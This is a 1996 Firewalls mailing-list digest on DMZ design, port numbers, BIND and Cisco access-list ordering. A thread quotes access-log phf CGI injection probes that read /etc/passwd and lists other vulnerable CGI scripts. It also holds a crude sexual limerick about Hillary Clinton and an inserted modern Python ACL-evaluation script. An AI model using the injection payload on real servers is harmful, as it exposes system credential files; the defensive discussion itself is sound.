- paul > Does the order matter? > > Any help would be greatly appreciated? > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jul 10 11:19:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA05522 for firewalls-outgoing; Wed, 10 Jul 1996 11:07:11 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA05486 for ; Wed, 10 Jul 1996 11:06:55 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA27708 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Wed, 10 Jul 96 11:02:56 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607101802.AA02049@manzanita.DEV.3Com.COM.noname> To: Firewalls@GreatCircle.COM, ggh14854@ussun2f.glaxo.com Subject: Re: Web Server on DMZ Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yes, you can put the web server on your DMZ, but the real answer here is to run TWO firewalls. Like so: --company net ---/Corp-Firewall/---DMZ w/servers---/outer firewall/ --Internet The job of the Corp-Firewall is to protect the company network, the job of the outer firewall is to protect the exposed servers. If necessary, the outer firewall can also be used as a backup corp firewall. Or better yet, to complement it by using a different technology which will help make your network harder to crack into. 
BobK From firewalls-owner Wed Jul 10 12:23:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA12959 for firewalls-outgoing; Wed, 10 Jul 1996 12:12:45 -0700 (PDT) Received: from gate.ups.com (gate.ups.com [198.80.14.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA12925 for ; Wed, 10 Jul 1996 12:12:10 -0700 (PDT) Received: from is.ups.com (smtp.telecom.ups.com) by gate.ups.com with SMTP id AA17374 Received: from butthead.ups.com by is.ups.com (5.x/SMI-SVR4) Received: from localhost by butthead.ups.com (SMI-8.6/SMI-SVR4) Date: Wed, 10 Jul 1996 15:09:06 -0400 (EDT) From: Dave Wreski X-Sender: tel1dvw@butthead To: Bob Konigsberg Cc: Firewalls@GreatCircle.COM, ggh14854@ussun2f.glaxo.com Subject: Re: Web Server on DMZ In-Reply-To: <9607101802.AA02049@manzanita.DEV.3Com.COM.noname> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jul 1996, Bob Konigsberg wrote: > > The job of the Corp-Firewall is to protect the company network, the > job of the outer firewall is to protect the exposed servers. > > If necessary, the outer firewall can also be used as a backup corp > firewall. Or better yet, to complement it by using a different technology > which will help make your network harder to crack into. What type of different technology do you recommend? This sounds interesting, as this is how we currently implement our firewalls/servers.. 
Dave > > BobK > From firewalls-owner Wed Jul 10 12:34:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA13461 for firewalls-outgoing; Wed, 10 Jul 1996 12:30:13 -0700 (PDT) Received: from ftp.com (ftp.com [128.127.2.122]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA13446 for ; Wed, 10 Jul 1996 12:30:03 -0700 (PDT) Received: from ftp.com by ftp.com ; Wed, 10 Jul 1996 15:27:26 -0400 Received: from mailserv-100bs.ftp.com by ftp.com ; Wed, 10 Jul 1996 15:27:26 -0400 Received: by MAILSERV-100BS.FTP.COM (SMI-8.6/SMI-SVR4) Date: Wed, 10 Jul 1996 15:26:12 -0400 Message-Id: <199607101926.PAA27134@MAILSERV-100BS.FTP.COM> To: lazar@netevolve.com Subject: Re: Well Known Port Numbers From: chip@ftp.com (Chip Sparling) Reply-To: chip@ftp.com Cc: firewalls@greatcircle.com Repository: mailserv-100bs.ftp.com, [message accepted at Wed Jul 10 15:26:02 1996] Originating-Client: slingshot.ftp.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I'm trying to find the well known TCP and UDP port numbers to allow >access to Usenet and WAIS but can't seem to find them in any of the >reference materials I have. Does anyone know of or have this >information? IANA owns these, the official list can be found at; ftp://venera.isi.edu/in-notes/iana/assignments/port-numbers if you backup one level you'll find all the assigned numbers. 
chip

From firewalls-owner Wed Jul 10 12:52:36 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA12921 for firewalls-outgoing; Wed, 10 Jul 1996 12:12:06 -0700 (PDT)
Received: from Grosses-Raetsel-Tor.GeNUA.DE (Grosses-Raetsel-Tor.GeNUA.DE [193.141.169.26]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA12914 for ; Wed, 10 Jul 1996 12:11:56 -0700 (PDT)
Received: (from smap@localhost) by Grosses-Raetsel-Tor.GeNUA.DE (8.6.12/8.6.12) id VAA28652; Wed, 10 Jul 1996 21:08:47 +0200
Received: from auryn.genua.de(192.109.217.42) by Grosses-Raetsel-Tor.GeNUA.DE via smap (V1.3)
Received: from auryn.genua.de (localhost [127.0.0.1]) by auryn.genua.de (8.7.4/8.7.3) with ESMTP id VAA20793; Wed, 10 Jul 1996 21:08:18 +0200 (MET DST)
Message-Id: <199607101908.VAA20793@auryn.genua.de>
To: Firewalls@greatcircle.com
cc: Shepherd Rudie
Subject: Re: DNS leakage
In-reply-to: Your message of Wed, 10 Jul 1996 01:00:30 -0700.
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <20790.837025697.1@auryn.genua.de>
Date: Wed, 10 Jul 1996 21:08:17 +0200
From: Bernhard Schneck
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Problem is this:
> The last time my zone was transferred to my ISP, the INTERNAL names
> suddenly appeared on the internet! Of course this wrecked e-mail and
> other things as well, but how is this possible? How can the outside DNS
> provide the secondary with any information regarding the inside? BTW the
> inside network is not even accessible from the Internet (and thus the
> secondary DNS). Any ideas?

Make sure you run a (moderately) recent version of BIND, 4.9.3p1 or 4.9.4. Earlier versions may have some problems with cache poisoning even in authoritative zones ...

\Bernhard.
From firewalls-owner Wed Jul 10 13:04:34 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA14042 for firewalls-outgoing; Wed, 10 Jul 1996 12:45:53 -0700 (PDT)
Received: from mis01.micron.net (mis01.micron.net [198.60.253.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA14033 for ; Wed, 10 Jul 1996 12:45:43 -0700 (PDT)
From: jbarnett@micron.net
Received: from 204.134.209.84 by mis01.micron.net with smtp
Message-Id:
Date: Wed, 10 Jul 96 13:43 MDT
Subject: Sidewinder Versus EagleRaptor
To: firewalls@GreatCircle.com
X-Mailer: AIR Mail 3.X (SPRY, Inc.)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My organization is finally coming close to making a decision on a firewall product. My question is this: is there anyone in this group who has evaluated both Sidewinder and EagleRaptor within the past year and has:

1) selected EagleRaptor but now wishes they had gone with Sidewinder

2) selected Sidewinder but now wishes they had gone with EagleRaptor

3) selected EagleRaptor for NT and is experiencing difficulties or is elated

You can respond privately to me at jbarnett@micron.net, please. Since this is the first time I have tried to post anything to this group (I just joined today), please forgive me if I somehow stepped on any rules for posting. Thanks!

jon

#########################################################
Jon Barnett                    jbarnett@micron.net
(208) 384-7018
"Colorful ideas are a pigment of your own imagination"
#########################################################

From firewalls-owner Wed Jul 10 13:20:08 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA13484 for firewalls-outgoing; Wed, 10 Jul 1996 12:31:35 -0700 (PDT)
Received: from morebbs.com (morebbs.com [206.165.150.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA13477 for ; Wed, 10 Jul 1996 12:31:24 -0700 (PDT)
From: meowmyx@morebbs.com
Received: by morebbs.com
Message-ID: <9607101528.0LQZ300@morebbs.com>
Organization: MORE BBS
X-Mailer: TBBS/TIGER v1.0/PRIMP 1.56p
Date: Wed, 10 Jul 96 15:28:54
Subject: Dirty dogs
To: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I was browsing through the system files of a web server that sits outside a firewall. There were a couple of interesting entries in the access log:

960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207

960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207

This didn't work for two reasons. One, there is no phf program in the system. Two, the cgi application gateway is running chrooted.

I am not really very good at understanding this hacking and cracking stuff. What else could they have tried that might have worked?

FlameThrower>> ON

The Mayor of White Water, had a very pretty daughter,
Her name was Sweet Hillary, she was eager to please.
Although lovely Hillary, wore clothes that were billowy,
The hairs on her dickey die doe, hung down to her knees.
One black one, one white one, and one that Bill caught a trout on,
The hairs on her dickey die doe, hung down to her knees.
If she were my daughter, I would have cut them much shorter,
The hairs on her dickey die doe, hung down to her knees.

Ooops Damn Slightly singed left whiskers

FlameThrower>> OFF

MeOwMyX

From firewalls-owner Wed Jul 10 13:24:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA16355 for firewalls-outgoing; Wed, 10 Jul 1996 13:04:20 -0700 (PDT)
Received: from dsacg1.dsac.dla.mil (dsacg1.dsac.dla.mil [131.78.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA16285 for ; Wed, 10 Jul 1996 13:04:03 -0700 (PDT)
Received: by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1))
From: nto2584@dsacg1.dsac.dla.mil (Steven C. Payne)
Message-Id: <9607101754.AA08182@dsacg1.dsac.dla.mil>
Subject: Re: Well Known Port Numbers
To: lazar@netevolve.com
Date: Wed, 10 Jul 96 13:54:32 EDT
Cc: firewalls@greatcircle.com
In-Reply-To: <9607101332.AA12409@netevolve.com>; from "Irwin Lazar" at Jul 10, 96 9:29 am
Mailer: Elm [revision: 70.85.2.1]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> Greetings all:
>
> I'm trying to find the well known TCP and UDP port numbers to allow
> access to Usenet and WAIS but can't seem to find them in any of the
> reference materials I have. Does anyone know of or have this
> information?

from /etc/services

nntp            119/tcp         readnews untp   # Network News Transfer Protocol

from the wais paper

5. Add in a z3950 entry to /etc/services on TCP port 210.
6. Add a line like the following to /etc/inetd to cause waisserver to be called when a connection comes in on the z3950 port:

z3950 stream tcp nowait nobody "

nntp (news) is port 119
wais (z3950) is port 210
both are tcp

stevep

>
> Thanks.
> Irwin M. Lazar
> Network Evolutions, Inc.
> lazar@netevolve.com
>

From firewalls-owner Wed Jul 10 13:25:18 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA13533 for firewalls-outgoing; Wed, 10 Jul 1996 12:32:51 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA13523 for ; Wed, 10 Jul 1996 12:32:36 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3)
Message-Id: <9607101929.AA22741@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
To: "John M. Shaw"
Cc: firewalls
From: Ryan.Russell/SYBASE
Date: 10 Jul 96 12:22:45 EDT
Subject: Re: Re[2]: Newbie Cisco Access-List Question
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

It depends. If the two serials plug into the same router at the other end, then you want a mux, or you'll have to run EIGRP or OSPF...even then, good luck.

If they go to two different ISPs, then get route updates for both, and the router will make the best choice for path. However, one of the interfaces will have to be the default, and usage of the two lines will be highly asymmetric. Even if one line fills, it won't overflow to the other.

Ryan

---------- Previous Message ----------
To: firewalls
cc:
From: jshaw @ dttus.com ("John M. Shaw") @ smtp
Date: 07/10/96 10:38:05 AM
Subject: Re[2]: Newbie Cisco Access-List Question

Is it the same for "ip route": If I have 2 lines from my ISP hooked up to the serial lines on my router :

ip route 0.0.0.0 0.0.0.0 Serial0
ip route 0.0.0.0 0.0.0.0 Serial1

Will anything get sent over Serial1? Is there a way to somewhat balance the load between the 2 lines?

TIA
jshaw@dttus.com

______________________________ Reply Separator _________________________________
Subject: Re: Newbie Cisco Access-List Question
Author: Warren Auld at INTERNET-USA
Date: 7/10/96 10:08 AM

Hi,

Yes, order matters -- the entries in an access list are evaluated sequentially until a match is found at which point the packet is either sent on or rejected. In the example you gave below, all packets addressed to ports higher than 1023 will make it through and the second line will never have any effect. If you reverse the lines, traffic to port 2049 would be denied while everything else above 1023 would get through.

Hope this helps....

warren
wauld01@mail.state.mo.us

On Wed, 10 Jul 1996, John M. Shaw wrote:

>
>
> Assuming 2 lines with same source, s-mask, dest, and d-mask:
>
> access-list 101 permit tcp source s-mask dest d-mask gt 1023
> access-list 101 deny tcp source s-mask dest d-mask eq 2049
>
> Which one takes precedence?
> Does the order matter?
>
> Any help would be greatly appreciated?
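Warren's point about sequential evaluation is easy to check by hand once the matching rule is spelled out. The script below is an added example (not from any of the posts) that parses the two access-list lines from the question, evaluates a packet against them top to bottom with the implicit deny at the end, and shows the verdict for port 2049 flipping when the lines are swapped; the address ranges standing in for "source s-mask dest d-mask" are assumed values.

```python
"""First-match evaluation of the two access-list entries from the thread above.

Added example, not from any of the posts. It parses only the subset of the
extended access-list syntax used there:
  access-list <n> permit|deny tcp <src> <src-wildcard> <dst> <dst-wildcard> [eq|gt|lt <port>]
The address ranges are assumed values chosen for the demonstration.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Ace:
    """One access-control entry (one access-list line)."""
    action: str            # "permit" or "deny"
    src: int
    src_wild: int          # Cisco wildcard mask: a 0 bit means "must match"
    dst: int
    dst_wild: int
    op: Optional[str]      # "eq", "gt", "lt" or None for "any port"
    port: Optional[int]


def _ip(text: str) -> int:
    return int(ipaddress.IPv4Address(text))


def parse_ace(line: str) -> Ace:
    f = line.split()
    if len(f) < 8 or f[0] != "access-list" or f[2] not in ("permit", "deny") or f[3] != "tcp":
        raise ValueError("unsupported access-list line: " + line)
    op = port = None
    if len(f) >= 10:
        op, port = f[8], int(f[9])
        if op not in ("eq", "gt", "lt"):
            raise ValueError("unsupported port operator: " + op)
    return Ace(f[2], _ip(f[4]), _ip(f[5]), _ip(f[6]), _ip(f[7]), op, port)


def _addr_match(addr: int, net: int, wild: int) -> bool:
    # Bits set in the wildcard are "don't care"; every other bit must be equal.
    return (((addr ^ net) & ~wild) & 0xFFFFFFFF) == 0


def _port_match(ace: Ace, dport: int) -> bool:
    if ace.op is None:
        return True
    if ace.op == "eq":
        return dport == ace.port
    if ace.op == "gt":
        return dport > ace.port
    return dport < ace.port   # "lt"


def evaluate(acl: List[Ace], src: str, dst: str, dport: int) -> str:
    """Walk the list top to bottom and return the action of the first entry
    that matches; a packet that matches nothing hits the implicit deny."""
    s, d = _ip(src), _ip(dst)
    for ace in acl:
        if (_addr_match(s, ace.src, ace.src_wild)
                and _addr_match(d, ace.dst, ace.dst_wild)
                and _port_match(ace, dport)):
            return ace.action
    return "deny"


# Assumed ranges standing in for "source s-mask dest d-mask" in the question.
PERMIT_HIGH = "access-list 101 permit tcp 192.0.2.0 0.0.0.255 198.51.100.0 0.0.0.255 gt 1023"
DENY_NFS = "access-list 101 deny tcp 192.0.2.0 0.0.0.255 198.51.100.0 0.0.0.255 eq 2049"

AS_POSTED = [parse_ace(PERMIT_HIGH), parse_ace(DENY_NFS)]   # permit first: the deny never fires
REVERSED = [parse_ace(DENY_NFS), parse_ace(PERMIT_HIGH)]    # deny first: 2049 is blocked


if __name__ == "__main__":
    for name, acl in (("as posted", AS_POSTED), ("reversed", REVERSED)):
        for port in (2049, 8080, 80):
            verdict = evaluate(acl, "192.0.2.10", "198.51.100.5", port)
            print(f"{name:9s} port {port:5d}: {verdict}")
```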
>
>

From firewalls-owner Wed Jul 10 14:13:10 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA22519 for firewalls-outgoing; Wed, 10 Jul 1996 13:41:26 -0700 (PDT)
Received: from umbc7.umbc.edu (f-umbc7.umbc.edu [130.85.3.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA22471 for ; Wed, 10 Jul 1996 13:41:14 -0700 (PDT)
Received: (from pauld@localhost) by umbc7.umbc.edu (8.6.12/Umbc) id QAA10461; Wed, 10 Jul 1996 16:38:42 -0400
Date: Wed, 10 Jul 1996 16:38:42 -0400 (EDT)
From: Paul Danckaert
To: meowmyx@morebbs.com
cc: firewalls@GreatCircle.COM
Subject: Re: Dirty dogs
In-Reply-To: <9607101528.0LQZ300@morebbs.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 10 Jul 1996 meowmyx@morebbs.com wrote:

>
> I was browsing through the system files of a web server that sits outside a
> firewall There were a couple of interesting entries in the access log
>
> 960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400]
> "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
>
> 960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400]
> "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
>
> This didnt work for two reasons One there is no phf program in the system
> Two the cgi application gateway is running chrooted
>
> I am not really very good at understanding this hacking and cracking stuff
> What else could they have tried that might have worked

It's pretty common to attack systems via the phf hole right now.. we see a fair amount of attacks towards that. That format is the same as some of the probes we have seen, so it's probably one of the scripts floating around. There is another that hides the "cat /etc/passwd" in the middle of a larger string, trying to make it less obvious, and a third that runs id, to see what uid your web server runs under.

Of course, you could always be less kind, and install a quick PHF script on your server that mails you all the information it can about the user connecting to it. Nice for a more real-time response against these probes.

As for other CGIs that could have worked, a good reference for this stuff is in the WWW security FAQ, at:

http://www.genome.wi.mit.edu/WWW/faqs/www-security-faq.html

It lists other vulnerable CGI scripts offhand:

AnyForm
http://www.uky.edu/~johnr/AnyForm2

FormMail
http://alpha.pr1.k12.co.us/~mattw/scripts.html

"phf" phone book script, distributed with NCSA httpd and Apache
http://hoohoo.ncsa.uiuc.edu/

(There are also vulnerabilities with the novell web server, as well as ones under NT..)

In general, you should never have CGI scripts/programs in your cgi-bin directory that you aren't using, or don't trust..

paul

From firewalls-owner Wed Jul 10 14:57:52 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA00886 for firewalls-outgoing; Wed, 10 Jul 1996 14:41:31 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA00873 for ; Wed, 10 Jul 1996 14:41:16 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3)
Message-Id: <9607102138.AA03032@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
To: meowmyx
Cc: firewalls
From: Ryan.Russell/SYBASE
Date: 10 Jul 96 14:12:45 EDT
Subject: Re: Dirty dogs
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hmm....worth tracking down. I guess whatever they might have succeeded at depends on any known holes for your web server.
You'll probably have better luck tracking down the one hanging off of Sprintnet than AOL. I wouldn't trust AOL to keep any useful records. In any case, if you wanna track them down, the sooner the better. If either site does keep records, better ask before they are gone.

Ryan

mcorange>trace 198.69.26.81

Type escape sequence to abort.
Tracing the route to 198.69.26.81

  1 BORDER7-SERIAL1-3.SANFRANCISCO.MCI.NET (204.70.161.17) 4 msec 56 msec 28 msec
  2 CORE2-FDDI-0.SANFRANCISCO.MCI.NET (204.70.158.49) 212 msec 36 msec 32 msec
  3 CORE3.SANFRANCISCO.MCI.NET (204.70.4.17) 16 msec 16 msec 32 msec
  4  * SOMEROUTER.SPRINTLINK.NET (206.157.77.66) 28 msec 8 msec
  5 SL-STK-5-F0/0.SPRINTLINK.NET (144.228.40.5) 20 msec 12 msec 16 msec
  6 SL-DC-6-H1/0-T3.SPRINTLINK.NET (144.228.10.1) 84 msec 76 msec 80 msec
  7 SL-DC-5-F0/0.SPRINTLINK.NET (144.228.20.5) 80 msec 80 msec 84 msec
  8 SL-NIS-1-S0-56K.SPRINTLINK.NET (144.228.25.38) 108 msec 112 msec 108 msec
  9  * * *
 10  * *

mcorange>trace 152.163.192.15

Type escape sequence to abort.
Tracing the route to WWW-B2.PROXY.AOL.COM (152.163.192.15)

  1 BORDER7-SERIAL1-3.SANFRANCISCO.MCI.NET (204.70.161.17) 8 msec 12 msec 8 msec
  2 CORE2-FDDI-0.SANFRANCISCO.MCI.NET (204.70.158.49) 12 msec 12 msec 24 msec
  3 CORE1.SANFRANCISCO.MCI.NET (204.70.4.169) 24 msec 28 msec 40 msec
  4 BORDER2-FDDI0-0.SANFRANCISCO.MCI.NET (204.70.3.162) 12 msec 8 msec 8 msec
  5 MFX.CNSS8.SAN-FRANCISCO.T3.ANS.NET (206.157.77.2) 20 msec 8 msec 4 msec
  6 FT0.CNSS19.LOS-ANGELES.T3.ANS.NET (140.222.19.1) 16 msec 24 msec 16 msec
  7 FT1.CNSS112.ALBUQUERQUE.T3.ANS.NET (140.222.112.2) 52 msec 48 msec 48 msec
  8 FT0.CNSS64.HOUSTON.T3.ANS.NET (140.222.64.1) 84 msec 76 msec 68 msec
  9 FT1.CNSS104.ATLANTA.T3.ANS.NET (140.222.104.2) 104 msec 100 msec 112 msec
 10 FT0.CNSS72.GREENSBORO.T3.ANS.NET (140.222.72.1) 104 msec 100 msec 100 msec
 11 FT0.CNSS56.WASHINGTON-DC.T3.ANS.NET (140.222.56.1) 104 msec 96 msec 128 msec
 12 F1-0.C56-11.WASHINGTON-DC.T3.ANS.NET (140.222.56.65) 112 msec 100 msec 100 msec
 13 ENSS150.T3.ANS.NET (204.151.29.10) 104 msec 200 msec 132 msec
 14 INET3-GW.BLUE.AOL.COM (198.81.0.43) 108 msec 100 msec 104 msec
 15 WWW-B2.PROXY.AOL.COM (152.163.192.15) 116 msec 108 msec 100 msec

---------- Previous Message ----------
To: firewalls
cc:
From: meowmyx @ morebbs.com @ smtp
Date: 07/10/96 03:28:54 PM
Subject: Dirty dogs

I was browsing through the system files of a web server that sits outside a firewall There were a couple of interesting entries in the access log

960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207

960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207

This didnt work for two reasons One there is no phf program in the system Two the cgi application gateway is running chrooted

I am not really very good at understanding this hacking and cracking stuff What else could they have tried that might have worked

FlameThrower>> ON

The
Mayor of White Water, had a very pretty daughter,
Her name was Sweet Hillary, she was eager to please.
Although lovely Hillary, wore clothes that were billowy,
The hairs on her dickey die doe, hung down to her knees.
One black one, one white one, and one that Bill caught a trout on,
The hairs on her dickey die doe, hung down to her knees.
If she were my daughter, I would have cut them much shorter,
The hairs on her dickey die doe, hung down to her knees.

Ooops Damn Slightly singed left whiskers

FlameThrower>> OFF

MeOwMyX

From firewalls-owner Wed Jul 10 15:05:36 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA02260 for firewalls-outgoing; Wed, 10 Jul 1996 14:56:40 -0700 (PDT)
Received: from magellan.knight-ridder.com (magellan.knight-ridder.com [206.28.156.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA02252 for ; Wed, 10 Jul 1996 14:56:32 -0700 (PDT)
Received: by magellan.knight-ridder.com; id OAA08855; Wed, 10 Jul 1996 14:52:26 -0400
Received: from unknown(166.108.10.12) by magellan.knight-ridder.com via smap (g3.0.3)
Message-ID: <31E42682.5C54@knight-ridder.com>
Date: Wed, 10 Jul 1996 17:54:10 -0400
From: Ricardo de La Fuente
Reply-To: lafuente@knight-ridder.com
Organization: Knight-Ridder, Inc.
X-Mailer: Mozilla 3.0b3Gold (Win95; I)
MIME-Version: 1.0
To: Firewalls@GreatCircle.COM
Subject: Re: Web Server on DMZ
References: <9607101802.AA02049@manzanita.DEV.3Com.COM.noname>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Bob Konigsberg wrote:
>
> Yes, you can put the web server on your DMZ, but the real answer here
> is to run TWO firewalls.
>
> Like so:
>
> --company net ---/Corp-Firewall/---DMZ w/servers---/outer firewall/ --Internet
>
> The job of the Corp-Firewall is to protect the company network, the
> job of the outer firewall is to protect the exposed servers.
>
> If necessary, the outer firewall can also be used as a backup corp
> firewall. Or better yet, to complement it by using a different technology
> which will help make your network harder to crack into.
>
> BobK

I believe it was Darren Reed who suggested a more elegant and less expensive solution by using a third interface on the firewall, thus enabling a third segment for public servers such as a Web server or FTP server. All traffic would have to go through the firewall, therefore protecting your web server as well. i.e.

                            Internet Router
                                  |
                                  |
Internal Net----Choke router ----Corp-Firewall ------Web Server, FTP server, etc.

--
Ricardo de La Fuente
Knight-Ridder, Inc.
One Herald Plaza
Miami, Florida 33132-1693
Stay Cool - Play Coed Underwater Hockey

From firewalls-owner Wed Jul 10 15:20:09 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA04812 for firewalls-outgoing; Wed, 10 Jul 1996 15:12:32 -0700 (PDT)
Received: from sapa.inka.de (sapa.inka.de [193.197.84.6]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA04772 for ; Wed, 10 Jul 1996 15:12:14 -0700 (PDT)
Received: from uu.inka.de (root@[193.197.84.8]) by sapa.inka.de
Received: from lina (ecki@lina.inka.de) by uu.inka.de
Received: by lina
Message-Id:
From: ecki@lina.inka.de (Bernd Eckenfels)
Subject: Re: Web Server on DMZ
To: ggh14854@ussun2f.glaxo.com
Date: Wed, 10 Jul 1996 23:59:39 +0200 (MET DST)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: from "Gary G. Hull" at Jul 10, 96 09:03:44 am
X-Mailer: ELM [version 2.4 PL25 PGP2]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

> What would be the security
> implications of moving our WEB Server to the DMZ?

The server has to be secure. If the server needs to access data from the internal net you might be in trouble. The DMZ router should filter all connections from outside except for the www port.

> What would
> be the best way to make it secure?

Disable anything you don't need. There should be NO line on "netstat -a" which u don't understand. Open logins only from the inside secure net and ensure no ip-spoofing is possible to the dmz.

> We would like to do this
> for performance reasons. Would having a box dedicated to WEB
> traffic located on the DMZ offer added performance to our
> WEB traffic?

Depends on the solution u have now. If you have a proxying firewall or a non-dedicated web server, a dedicated web server with no firewall will be faster anyway.

> one could expect from the TIS Gauntlet for Web Traffic?

Compared to other proxy firewalls very high, but packet filter firewalls are generally faster. See the TIS WWW page for a speed test in some labs.
Greetings
Bernd

From firewalls-owner Wed Jul 10 15:34:42 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05078 for firewalls-outgoing; Wed, 10 Jul 1996 15:15:34 -0700 (PDT)
Received: from cypress.cycon.com (cypress.CYCON.COM [204.5.16.32]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA05069 for ; Wed, 10 Jul 1996 15:15:26 -0700 (PDT)
Received: (from carlson@localhost) by cypress.cycon.com (8.7.5/8.7.3) id SAA14482; Wed, 10 Jul 1996 18:13:47 -0400
Date: Wed, 10 Jul 1996 18:13:47 -0400 (EDT)
From: Chris Carlson
To: meowmyx@morebbs.com
cc: firewalls@GreatCircle.COM
Subject: Re: Dirty dogs
In-Reply-To: <9607101528.0LQZ300@morebbs.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 10 Jul 1996 meowmyx@morebbs.com wrote:

>
> I was browsing through the system files of a web server that sits outside a
> firewall There were a couple of interesting entries in the access log
>
> 960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400]
> "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
>
> 960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400]
